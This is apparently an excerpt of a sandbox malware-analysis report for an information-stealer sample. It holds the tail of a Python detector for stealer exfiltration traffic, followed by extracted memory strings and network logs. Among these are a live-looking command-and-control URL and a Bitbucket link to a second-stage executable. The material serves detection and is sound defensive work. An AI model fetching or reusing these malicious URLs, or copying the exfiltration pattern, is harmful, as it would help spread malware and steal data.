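        if host in c2_domains:
            findings.append({"type": "known_c2", "src": src, "host": host, "requests": len(evs)})
        posts = [e for e in evs if e["method"] == "POST" and e["path"] == "/api"]
        checkins = [e for e in posts if e["ctype"].startswith(FORM) and e["length"] <= max_checkin_bytes]
        uploads = [e for e in posts if e["ctype"].startswith("multipart/form-data")]
        # tiny form-encoded check-in first, multipart uploads to the same endpoint afterwards
        if checkins and uploads and min(c["ts"] for c in checkins) < max(u["ts"] for u in uploads):
            findings.append({"type": "stealer_exfil_pattern", "src": src, "host": host,
                             "checkins": len(checkins), "uploads": len(uploads),
                             "bytes_uploaded": sum(u["length"] for u in uploads)})
            exfil_sources.add(src)
    for e in events:                      # only clients that already matched the exfil shape
        clean_path = e["path"].split("?", 1)[0]
        if e["src"] in exfil_sources and e["method"] == "GET" and clean_path.lower().endswith(".exe"):
            findings.append({"type": "possible_loader_download", "src": e["src"],
                             "url": e["host"] + clean_path})
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

The shape heuristic on its own will also fire on legitimate clients that post a small form and then upload files to the same endpoint, so in production it should be scored together with the domain list, the age of the .lat domain and, where an EDR can see the process, the mismatch between a Chrome user agent and a non-browser image such as Yh6fS6qfTE.exe; the JA3 hash is too common on Windows to add much weight.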
Note: the cacerts/crl/ocsp/lencr/amazontrust URLs below are read out of DER-encoded X.509 certificates from the TLS sessions (the trailing characters such as 0E, 0A or 0= are the DER bytes that follow each URL); the atlassian.com and atl-paas.net hosts come from Bitbucket page content fetched during the download, http://nsis.sf.net/NSIS_Error is the Nullsoft installer runtime's error URL, and ac.ecosia.org is a browser search-provider URL read from browser data. None of these is attacker infrastructure.
Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Yh6fS6qfTE.exe, 00000000.00000003.1475916315.0000000001424000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1514509667.000000000142F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro0
Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTru/p&Jr
Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875849808.00000000061F9000.00000002.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605121311.0000000005B5A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: Amcache.hve.5.dr | String found in binary or memory: http://upx.sf.net
Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aui-cdn.atlassian.com/
Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605364436.0000000001441000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605364436.0000000001441000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/G%
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1872620005.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1869447514.0000000000D5B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1872268064.00000000013BA000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/
                Source: Yh6fS6qfTE.exe, Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013DA000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1431442535.0000000005AB1000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/api
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/apic
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat:443/api
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1404218755.0000000005BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1404218755.0000000005BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1404218755.0000000005BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1404218755.0000000005BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1404218755.0000000005BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1404218755.0000000005BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1404218755.0000000005BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49703 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.10:49758 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.217.18.140:443 -> 192.168.2.10:49764 version: TLS 1.2
